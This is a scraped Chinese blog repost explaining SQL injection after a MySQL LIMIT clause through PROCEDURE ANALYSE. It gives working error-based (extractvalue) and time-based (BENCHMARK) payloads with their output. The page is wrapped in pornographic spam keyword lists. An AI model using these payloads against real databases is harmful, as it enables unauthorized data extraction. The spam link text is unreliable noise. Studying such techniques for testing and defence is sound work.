日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 运维知识 > 数据库 >内容正文

数据库

MySQL 在 LIMIT 条件后注入

發(fā)布時(shí)間:2025/7/14 数据库 35 豆豆
生活随笔 收集整理的這篇文章主要介紹了 MySQL 在 LIMIT 条件后注入 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

from:https://rateip.com/blog/sql-injections-in-mysql-limit-clause/

此方法適用于MySQL 5.x中,在limit語(yǔ)句后面的注入
例如:

  • SELECT??
  • ????[ALL?|?DISTINCT?|?DISTINCTROW?]??
  • ??????[HIGH_PRIORITY]??
  • ??????[STRAIGHT_JOIN]??
  • ??????[SQL_SMALL_RESULT]?[SQL_BIG_RESULT]?[SQL_BUFFER_RESULT]??
  • ??????[SQL_CACHE?|?SQL_NO_CACHE]?[SQL_CALC_FOUND_ROWS]??
  • ????select_expr?[,?select_expr?…]??
  • ????[FROM?table_references??
  • ????[WHERE?where_condition]??
  • ????[GROUP?BY?{col_name?|?expr?|?position}??
  • ??????[ASC?|?DESC],?…?[WITH?ROLLUP]]??
  • ????[HAVING?where_condition]??
  • ????[ORDER?BY?{col_name?|?expr?|?position}??
  • ??????[ASC?|?DESC],?…]??
  • ????[LIMIT?{[offset,]?row_count?|?row_count?OFFSET?offset}]??
  • ????[PROCEDURE?procedure_name(argument_list)]??
  • ????[INTO?OUTFILE?‘file_name’?export_options??
  • ??????|?INTO?DUMPFILE?‘file_name’??
  • ??????|?INTO?var_name?[,?var_name]]??
  • ????[FOR?UPDATE?|?LOCK?IN?SHARE?MODE]]??
  • 在LIMIT后面可以跟兩個(gè)函數(shù),PROCEDURE 和 INTO,INTO除非有寫入shell的權(quán)限,否則是無(wú)法利用的,那么使用PROCEDURE函數(shù)能否注入呢?

    Let’s give it a try:

  • mysql>?SELECT?field?FROM?table?where?id?>?0?ORDER?BY?id?LIMIT?1,1?PROCEDURE?ANALYSE(1);??
  • ???
  • ERROR?1386?(HY000):?Can’t?use?ORDER?clause?with?this?procedure??
  • ANALYSE可以有兩個(gè)參數(shù):

  • mysql>?SELECT?field?FROM?table?where?id?>?0?ORDER?BY?id?LIMIT?1,1?PROCEDURE?ANALYSE(1,1);??
  • ???
  • ERROR?1386?(HY000):?Can’t?use?ORDER?clause?with?this?procedure??
  • 看起來(lái)并不是很好,繼續(xù)嘗試:
    mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure
    analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);
    但是立即返回了一個(gè)錯(cuò)誤信息:
    ERROR 1108 (HY000): Incorrect parameters to procedure ‘a(chǎn)nalyse’
    sleep函數(shù)肯定沒(méi)有執(zhí)行,但是最終我還是找到了可以攻擊的方式:
    mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

    ERROR 1105 (HY000): XPATH syntax error: ‘:5.5.41-0ubuntu0.14.04.1′
    如果不支持報(bào)錯(cuò)注入的話,還可以基于時(shí)間注入:
    SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1
    PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
    直接使用sleep不行,需要用BENCHMARK代替。

    PS:測(cè)試成功,無(wú)圖無(wú)真相:

    轉(zhuǎn)載于:https://www.cnblogs.com/qing123/p/4575901.html

    總結(jié)

    以上是生活随笔為你收集整理的MySQL 在 LIMIT 条件后注入的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

    如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 99色影院 | 边吃奶边添下面好爽 | 日本在线三级 | 国产欧美久久一区二区三区 | wwwxxx黄色片| 国产精品刘玥久久一区 | 99久久免费精品 | 久久久久亚洲av无码麻豆 | 伦伦影院午夜理论片 | 精品午夜一区二区 | 欧美激情视频一区二区三区在线播放 | 日韩一区二区中文字幕 | 麻豆成人在线 | 国产日韩一区二区在线观看 | 日韩久久一区二区 | 国外成人免费视频 | 毛片毛片毛片毛片毛片 | 四虎网址在线 | 一区二区视频播放 | 久操久热 | 亚洲精品无码一区二区 | 性xxxx视频播放免费 | 人人爱爱人人 | 乳色吐息在线观看 | 黄色xxx| 黄色小视频在线看 | 四虎永久网站 | 日韩精品一区二区三区高清免费 | 日吊视频 | 肉感丰满的av演员 | www.在线视频 | 国产男人搡女人免费视频 | 成人av入口 | 日本三级小视频 | 夫妻自拍偷拍 | 日韩中文字幕免费 | 亚洲免费av电影 | 玖玖热视频| 国产一区二区免费视频 | 日韩午夜剧场 | 亚洲第一网址 | 一区二区三区四区在线观看视频 | 激情欧美一区二区免费视频 | 视频一区二区三区在线 | 欧美精品123区 | 79日本xxxxxxxxx18| 国产一区视频在线观看免费 | 性猛交ⅹxxx富婆video | 男女av在线 | 一级特黄aaaaaa大片 | 美攻壮受大胸奶汁(高h) | 精品成人一区 | 国产精品传媒视频 | 天天爽夜夜爽视频 | 日韩欧美精品一区二区 | 国产成年人视频 | 久久作爱视频 | 精品福利在线视频 | 中文字幕在线观看视频www | 欧美一级片网址 | 不卡影院| 久久精品国产99国产精品 | 一级空姐毛片 | 欧美高清性xxxxhdvideosex | 亚洲午夜在线 | 欧美做受高潮中文字幕 | 2020av视频| 少妇太紧太爽又黄又硬又爽小说 | 国产大屁股喷水视频在线观看 | 九一国产视频 | 毛片a区| 日韩123| 欧美专区在线播放 | 中文字幕免费一区二区 | 欧美天天搞 | 黑名单上的人全集免费观看 | 人妻偷人精品一区二区三区 | 三上悠亚一区二区在线观看 | 精品伊人久久 | 成人乱人乱一区二区三区一级视频 | 97色伦97色伦国产欧美空 | 免费成人在线播放 | 日韩欧美国产精品综合嫩v 国产小毛片 | 中国女人内精69xxxxxx | 国产看片网站 | 99色婷婷 | 日日爱666 | 在线免费观看亚洲视频 | 天天艹天天爽 | 夜夜躁狠狠躁 | 福利久久久 | 国产中文字幕久久 | 91日本在线观看 | 爱情岛亚洲品质自拍极速福利网站 | 精品国产理论 | 看全色黄大色黄大片大学生 | 日本公与丰满熄 | 1区2区3区在线观看 久久久久久久久久久影院 成人网址在线观看 | 亚洲爱v |